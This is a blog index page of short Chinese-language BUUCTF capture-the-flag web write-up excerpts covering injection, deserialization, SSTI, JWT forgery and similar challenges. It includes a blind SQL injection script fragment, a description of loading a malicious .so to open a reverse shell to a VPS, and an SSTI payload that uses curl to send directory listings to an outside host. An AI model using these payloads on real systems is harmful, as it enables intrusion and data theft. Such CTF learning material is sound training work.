![](https://img-blog.csdnimg.cn/20201014180756926.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
BUUCTF
文章平均质量分 54
succ3
Everything is done, like a dream bubble!
展开
-
[XNUCA2019Qualifier]EasyPHP
htaccess 的各种利用 y4 师傅的文章就写的很详细,其中还有很多解决这道题的方法,这边就不一一列举了。拼接上下两行,那么我们可以直接在 .htaccess 里写 shell,加上。php 的 .htaccess 文件中可以用 # 号注释某行,也可以用。设置把 shell 包含到 index.php 中。payload: 当然要对代码 url 编码一下。原创 2023-03-05 09:12:14 · 443 阅读 · 0 评论 -
[蓝帽杯 2021]One Pointer PHP
((constructor)) 似乎是 c 中的扩展修饰符,它可以让被修饰的函数在 main() 之前执行,如果它出现在动态链接库中,那么一旦动态链接库被系统加载,将立即执行 _attribute((constructor)) 修饰的函数。这样我们就可以把我们服务器上的恶意 fastcgi 请求通过 ftp 伪协议传输到靶机上,然后靶机就会重定向到本地的 9001 端口的 fpm 上,然后会把我们的 so 文件载入扩展,触发我们的恶意 so 文件,把 shell 反弹到我们的 vps 上。原创 2023-02-27 20:35:45 · 522 阅读 · 0 评论 -
[HarekazeCTF2019]Easy Notes
[HarekazeCTF2019]Easy Notes原创 2023-02-23 21:26:50 · 529 阅读 · 0 评论 -
[GYCTF2020]Node Game
要注意的就是这个 CRLF 编码后攻击的时候总是崩溃,试了半天才成功,不知道是不是之前的数据包有问题。把 vps 替换一下就可以了,也可以用有相似功能的网站,或者其他的方法。这边就不多赘述了:下面大佬讲的就很清楚。nc 一下就可以了。原创 2023-02-12 21:39:28 · 323 阅读 · 0 评论 -
[2020 新春红包题]1
thinkphp 简略反序列化链原创 2022-11-18 13:26:39 · 539 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web2]ikun
知识点:pickle ,jwt 伪造,爆破密钥原创 2022-11-13 10:45:43 · 986 阅读 · 0 评论 -
[SWPU2019]Web3
知识点:利用 404 页面获取密钥,利用 ln -s 建立软连接,利用 proc 文件系统。原创 2022-11-10 10:56:59 · 532 阅读 · 0 评论 -
[RoarCTF 2019]Simple Upload
知识点: thinkphp upload 漏洞利用原创 2022-11-10 10:00:07 · 459 阅读 · 0 评论 -
[RCTF 2019]Nextphp
知识点;利用 FFI 绕过 disable_function原创 2022-11-09 21:15:04 · 606 阅读 · 0 评论 -
[RoarCTF 2019]PHPShe
知识点: phpshe cms 代码审计(代码对比,phar 反序列化,sql突破安全函数)原创 2022-11-09 16:20:46 · 835 阅读 · 0 评论 -
2022DASCTF Apr X FATE 防疫挑战赛
warmup-php先分析一下index.php的内容,创建一个对象,并且循环赋值,然后调用run函数。<?phpspl_autoload_register(function($class){ require("./class/".$class.".php");});highlight_file(__FILE__);error_reporting(0);$action = $_GET['action'];$properties = $_POST['properties'];c原创 2022-05-05 13:47:11 · 309 阅读 · 0 评论 -
[SWPU2019]Web6
知识点:SQL注入中的with rollup、SoapClient 和 Soapserver原创 2022-11-06 13:56:03 · 770 阅读 · 0 评论 -
[PASECA2019]honey_shop
知识点: proc 查进程的环境变量原创 2022-11-04 18:19:51 · 225 阅读 · 0 评论 -
[HFCTF2020]BabyUpload
知识点:session 反序列化( php_binary处理器 )原创 2022-11-04 10:45:22 · 173 阅读 · 0 评论 -
[NPUCTF2020]ezlogin
知识点:xml中的xpath盲注原创 2022-11-03 15:14:38 · 218 阅读 · 0 评论 -
DASCTF2022.07赋能赛 web 复现
DASCTF2022.07赋能赛 web 复现原创 2022-11-02 15:57:15 · 559 阅读 · 0 评论 -
DASCTF X GFCTF 2022十月挑战赛
Dasctf 复现原创 2022-10-29 20:47:14 · 1117 阅读 · 0 评论 -
DASCTF X CBCTF 2022九月挑战赛
找给 check.php 发包的那个部分。可以在开发者工具里全局搜索一下,发现是 sn 这个函数发的包,代码有点乱可以。在 sn 函数中看到了三个参数的设置。先看一下是在哪边调用的 sn ,然后一个一个的跟踪就行了。搜索 checkCode ,checkCode 由一串字符串和 salt 构成,而 tm 是时间戳,score 是分数,最后就可以构造 exp了。原创 2022-10-19 11:30:12 · 673 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day2 Web1]Hack World 1
知识点:布尔注入,空格代替根据提示select flag from flag输入id=0,显示错误输入id=1,显示helloimport requestsurl = 'http://2895fd0f-6a71-4955-a21b-cfb434989994.node4.buuoj.cn:81/index.php'result = ''for i in range(1, 50): for j in range(32, 128): datas = {原创 2022-02-26 16:37:28 · 274 阅读 · 0 评论 -
NewStarCTF 公开赛赛道
基础练习原创 2022-10-06 09:54:21 · 1926 阅读 · 0 评论 -
N1BOOK详解
然后上传,访问/zzz.php.zzz就可以了,这样就解析成php了,因为apache是从右到左解析的,遇到不认识的后缀就忽略,继续往前解析,但这个漏洞有版本限制。用户名为admin时,显示账号或密码错误,但用户名不是admin时,显示账号不存在,所以用户名是admin。但是第三步一直成功不了,就尝试用nc直接下载也没成功,不清楚是怎么回事,望大佬告之!两种方式,一种布尔盲注,一种报错注入,也有可能有第三种,user.php没用到。,然后压缩,再用010打开,选择并双击一个start不为0h的。原创 2022-10-06 09:50:46 · 1376 阅读 · 0 评论 -
[De1CTF 2019]SSRF Me
知识点:代码审计。原创 2022-09-28 22:33:06 · 114 阅读 · 0 评论 -
[HITCON 2017]SSRFme
知识点:peal中get命令漏洞(get中的open函数)原创 2022-09-27 09:49:48 · 895 阅读 · 0 评论 -
[RoarCTF 2019]Online Proxy
知识点:二次注入查看源码,可以看到当前的ip,盲猜是通过X-Forwarded-For或者Client-ip,经测试是X-Forwarded-For例如:我们加上X-Forwarded-For:127.0.0.1,它会把当前和上次的ip显示出来,一股浓浓的二次注入的味道。测试:先输入注入,显示在当前ip位置在输入一个ip,那么注入语句就会显示在last-ip,此时已经写入数据库我们在用刚才的那个ip,因为当前ip和上次输入的一样,所以他会在数据库中寻找,上一次不通过的ip,这样我们的注原创 2022-09-20 20:56:56 · 175 阅读 · 0 评论 -
[RootersCTF2019]ImgXweb
知识点:jwt伪造我们注册一个账号,登录可以看到一传jwt格式的加密解密可以看到,user处为我们的账号名,我们可以把它改为admin,还需要一个密钥有robots.txt,且显示了一个文件,看文件名字,没错这就是密钥得到jwt伪造后的admin修改session为我们伪造后的jwt,然后就可以看到一个flag.png图片,直接看是看不到的,那我们就抓个包看看。也可以curl它...原创 2022-09-20 20:53:07 · 171 阅读 · 0 评论 -
[RootersCTF2019]babyWeb
知识点:报错注入,用16进制(0x)代替引号的功能原创 2022-09-19 16:57:41 · 770 阅读 · 0 评论 -
[羊城杯 2020]Easyphp2
知识点:伪协议,linux下的su命令(更改当前用户)原创 2022-09-19 12:21:51 · 633 阅读 · 0 评论 -
[GWCTF 2019]mypassword
知识点:xss原创 2022-09-18 21:42:57 · 476 阅读 · 0 评论 -
[SUCTF 2018]annonymous
create_function匿名命名规则原创 2022-09-18 11:52:27 · 125 阅读 · 0 评论 -
[SWPU2019]Web4
知识点:16进制+mysql预处理,在PDO环境下的sql进行堆叠注入、mvc框架的简单审计、extract函数变量覆盖原创 2022-09-17 22:22:12 · 679 阅读 · 0 评论 -
[EIS 2019]EzPOP
知识点:file_put_contents用php://filter绕过exit,代码审计原创 2022-09-16 12:09:51 · 355 阅读 · 0 评论 -
[GYCTF2020]Ez_Express
知识点:toUpperCase()特殊字符替代,原型链污染,由原型链污染触发ssti直接rce(res.render)原创 2022-09-14 17:09:57 · 425 阅读 · 0 评论 -
[HarekazeCTF2019]Avatar Uploader 1
finfo_file和getimagesize函数原创 2022-09-10 20:11:36 · 335 阅读 · 0 评论 -
[CISCN2019 总决赛 Day1 Web4]Laravel1
代码审计原创 2022-09-08 11:00:03 · 310 阅读 · 0 评论 -
[强网杯 2019]Upload
代码审计原创 2022-09-06 11:08:05 · 624 阅读 · 6 评论 -
[CISCN2019 华东南赛区]Web4
知识点:flask-session伪造发现参数url,且这个格式像python的路由,测试得可以任意文件读取。读文件可以看出当session['username'] == 'fuck'时可以得到flag。import re, random, uuid, urllibfrom flask import Flask, session, requestapp = Flask(__name__)random.seed(uuid.getnode())app.config['SECRET_KEY原创 2022-05-18 13:29:44 · 288 阅读 · 0 评论 -
[CISCN2019 华北赛区 Day1 Web1]Dropbox
知识点:任意文件下载,phar反序列化因为我是在buuctf上做的,所以直接看到了phar,并没有在登录,注册页面找洞,当然看完源码后会发现,也并没有sql注入的洞。上传一个文件,可以下载和删除,且本题没找到其他功能,或者是可以读源码的地方,那么是否存在任意文件下载呢?抓包可以发现确实可以任意文件下载,至于路径,多试试呗。有很多文件,login、register、index、download、delete、class。但中要的也就是index、download、delete、class,这原创 2022-05-13 21:00:21 · 375 阅读 · 0 评论 -
[CISCN2021 Quals]upload
在这里插入代码片upload.php,中限制了图片的大小,长宽,以及一些字母。<?php#Quals]upload if (!isset($_GET["ctf"])) { highlight_file(__FILE__); die();}if(isset($_GET["ctf"])) $ctf = $_GET["ctf"];if($ctf=="upload") { if ($_FILES['postedFile']['size'] > 1024原创 2022-05-06 11:45:21 · 833 阅读 · 3 评论 -
[De1CTF 2019]Giftbox
知识点:totp,php特性,open_basedir绕过分析进入题目看到一个可以执行命令的页面,可以通过help来查看有哪些命令。有一个文件和两个文件夹。看一下usage.md文件,里面有几条命令,不管是哪条命令都要先登录。经过测试可以发现,有回显,但没有报错,那么可以考虑sql盲注,来爆密码。接着就要写exp,但在这之前还要看一下,它是怎么传到服务器的。在network中可以看到,是通过shell.php来传的并且带着一个totp参数,这个totp看着像一个随时间变化的令牌,每原创 2022-05-05 13:33:16 · 855 阅读 · 0 评论 -
[GWCTF 2019]你的名字
知识点;ssti参考:Python模板注入(SSTI)深入学习wp外带{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl https://sfg56dsf.free.beeceptor.com/?i=`ls / |base64`') %}1{% endico原创 2022-04-15 22:42:26 · 875 阅读 · 0 评论